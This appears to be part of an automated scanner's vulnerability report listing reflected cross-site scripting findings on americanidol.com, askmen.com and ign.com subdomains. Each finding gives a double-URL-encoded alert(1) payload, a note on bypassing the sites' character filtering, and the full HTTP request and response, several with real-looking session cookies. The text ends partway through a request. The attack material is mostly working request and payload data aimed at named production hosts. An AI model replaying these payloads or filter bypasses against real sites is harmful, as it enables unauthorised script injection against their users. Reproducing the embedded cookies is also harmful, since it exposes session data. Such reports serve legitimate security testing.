The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 51aed%253balert%25281%2529%252f%252f31e4ba16cf was submitted in the REST URL parameter 1. This input was echoed as 51aed;alert(1)//31e4ba16cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /tools51aed%253balert%25281%2529%252f%252f31e4ba16cf/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4262
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_tools51aed;alert(1)//31e4ba16cf/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Sh
...[SNIP]...

1.105. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f67%2522%253balert%25281%2529%252f%252f718932c3ebf was submitted in the REST URL parameter 1. This input was echoed as f3f67";alert(1)//718932c3ebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /toolsf3f67%2522%253balert%25281%2529%252f%252f718932c3ebf/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4290
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:29 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf3f67";alert(1)//718932c3ebf/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           //
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsf3f67";alert(1)//718932c3ebf/keyslave.one'"-->
...[SNIP]...

1.106. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96f76%2527%253balert%25281%2529%252f%252fd1bbe2ce575 was submitted in the REST URL parameter 1. This input was echoed as 96f76';alert(1)//d1bbe2ce575 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /tools96f76%2527%253balert%25281%2529%252f%252fd1bbe2ce575/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4290
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:30 GMT
Connection: close

       function oneWidgetWaitForCookie_tools96f76';alert(1)//d1bbe2ce575/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           //
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools96f76';alert(1)//d1bbe2ce575/keyslave.one'"-->
...[SNIP]...

1.107. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one/%22ns=%22netsparker(0x00004A)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f41%2527%253balert%25281%2529%252f%252f79209a69875 was submitted in the REST URL parameter 1. This input was echoed as 40f41';alert(1)//79209a69875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /tools40f41%2527%253balert%25281%2529%252f%252f79209a69875/keyslave.one/%22ns=%22netsparker(0x00004A) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3862
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:36 GMT
Connection: close

       function oneWidgetWaitForCookie_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A)() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...
Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A)) {
                   setTimeout(oneWidgetWaitForCookie_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A), 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAlready
...[SNIP]...

1.108. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one/%22ns=%22netsparker(0x00004A)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3c294%253balert%25281%2529%252f%252f0410001729d was submitted in the REST URL parameter 1. This input was echoed as 3c294;alert(1)//0410001729d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /tools3c294%253balert%25281%2529%252f%252f0410001729d/keyslave.one/%22ns=%22netsparker(0x00004A) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3844
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:36 GMT
Connection: close

       function oneWidgetWaitForCookie_tools3c294;alert(1)//0410001729d_keyslave.one_"ns="netsparker(0x00004A)() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document.
...[SNIP]...

1.109. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95bdb%2527%253balert%25281%2529%252f%252f959d5468c2 was submitted in the REST URL parameter 1. This input was echoed as 95bdb';alert(1)//959d5468c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /tools95bdb%2527%253balert%25281%2529%252f%252f959d5468c2/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3894
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:40 GMT
Connection: close

       function oneWidgetWaitForCookie_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B))() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...
Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B))) {
                   setTimeout(oneWidgetWaitForCookie_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B)), 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAlread
...[SNIP]...

1.110. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea7bb%253balert%25281%2529%252f%252fd66f8c5aaae was submitted in the REST URL parameter 1. This input was echoed as ea7bb;alert(1)//d66f8c5aaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /toolsea7bb%253balert%25281%2529%252f%252fd66f8c5aaae/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3886
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:41 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsea7bb;alert(1)//d66f8c5aaae_keyslave.one_"ns="netsparker(0x00004B))() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...

1.111. http://wrapper.askmen.com/a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wrapper.askmen.com
Path:	/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7407a<script>alert(1)</script>3466efce8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=prestitial&network_name_override=askmen&channel_name_override=Homepage&pagetype=am_channel&rf=http%3A%2F%2Fwww.newscorp.com&r=http$3A$2F$2Fwww$2Enewscorp$2Ecom$2Foperations$2Fother$2Ehtml$23&7407a<script>alert(1)</script>3466efce8f4=1 HTTP/1.1
Host: wrapper.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; __utma=173688037.2045369409.1317753551.1317753551.1317756136.2; __utmz=173688037.1317756136.2.2.utmcsr=askmen.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:06:11 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: NGUserID=175e5;Path=/;Domain=.askmen.com;Expires=Wed, 02-Apr-31 20:06:11 GMT
Set-Cookie: freq=c-1317758771058v-1n-29mc+1317758770952mv+0mn+0wwe~0;Path=/;Domain=.askmen.com
Content-Length: 1799

if((typeof ataxscript == 'undefined' || ataxscript.length == 0) &&
(typeof ataximg == 'undefined' || ataximg.length == 0) &&
(typeof showStitial == 'undefined' || !showStitial) &&
(typeof
...[SNIP]...
<"+"script src='http://atax.askmen.com/size=1x1&network=fim&site=askmen&dechannel=askmen&subdomain=www.askmen.com&hosted_id=7700&channel_name_override=Homepage&7407a<script>alert(1)</script>3466efce8f4=1&network_name_override=askmen&pagetype=am_channel&rf=http$253A$252F$252Fwww.newscorp.com&r=http$253A$252F$252Fwww.newscorp.com$252Foperations$252Fother.html$2523&PageId=1317758771058&random=131775877
...[SNIP]...

1.112. http://wrapper.ign.com/a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wrapper.ign.com
Path:	/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7101a<script>alert(1)</script>8b9ff9ff23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial&dechannel=ign&7101a<script>alert(1)</script>8b9ff9ff23=1 HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(1)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:39 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 73166

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
<"+"script type='text/javascript' src='http://a.ign-omy.com/js.ng/size=text&network=fim&site=ign&subdomain=xboxlive.ign.com&hosted_id=0&channel_id=58&dechannel=ign&7101a<script>alert(1)</script>8b9ff9ff23=1&pagetype=stitial&reginsider=a&PageId=1317765759443&random=1317765759443&country2=us&server=media-adwrapper-prd-app-01.las1.colo.ignops.com&rsi_segs=&property=ign&tile="+tile+"'>
...[SNIP]...

1.113. http://wrapper.ign.com/a [pagetype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wrapper.ign.com
Path:	/a

Issue detail

The value of the pagetype request parameter is copied into the HTML document as plain text between tags. The payload 38ef8<script>alert(1)</script>7c600bdd0ef was submitted in the pagetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial38ef8<script>alert(1)</script>7c600bdd0ef&dechannel=ign HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(1)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:29 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 73475

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
ght 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="ign:ign:stitial38ef8<script>alert(1)</script>7c600bdd0ef";        /* Page Name */
s.server=location.host;
s.prop1="";
s.prop2="ign";            /* Network */
s.prop3="ign";            /* Channel */
s.prop4="stitial38ef8<script>
...[SNIP]...

1.114. http://www.americanidol.com/photos/hothome/ [all parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/photos/hothome/

Issue detail

The value of the all request parameter is copied into the HTML document as plain text between tags. The payload 638f0<a>0a93004fbcc was submitted in the all parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=1&all=true638f0<a>0a93004fbcc HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:05 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:05 GMT
Content-Length: 16409
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=1&all=true638f0<a>0a93004fbcc]]>
...[SNIP]...

1.115. http://www.americanidol.com/photos/hothome/ [feed parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/photos/hothome/

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 89dc6<a>edda9f5fe41 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=189dc6<a>edda9f5fe41&all=true HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:04 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:04 GMT
Content-Length: 16409
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=189dc6<a>edda9f5fe41&all=true]]>
...[SNIP]...

1.116. http://www.americanidol.com/photos/hothome/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.americanidol.com
Path:	/photos/hothome/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef2e2<a>0d1a3c47574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=1&all=true&ef2e2<a>0d1a3c47574=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
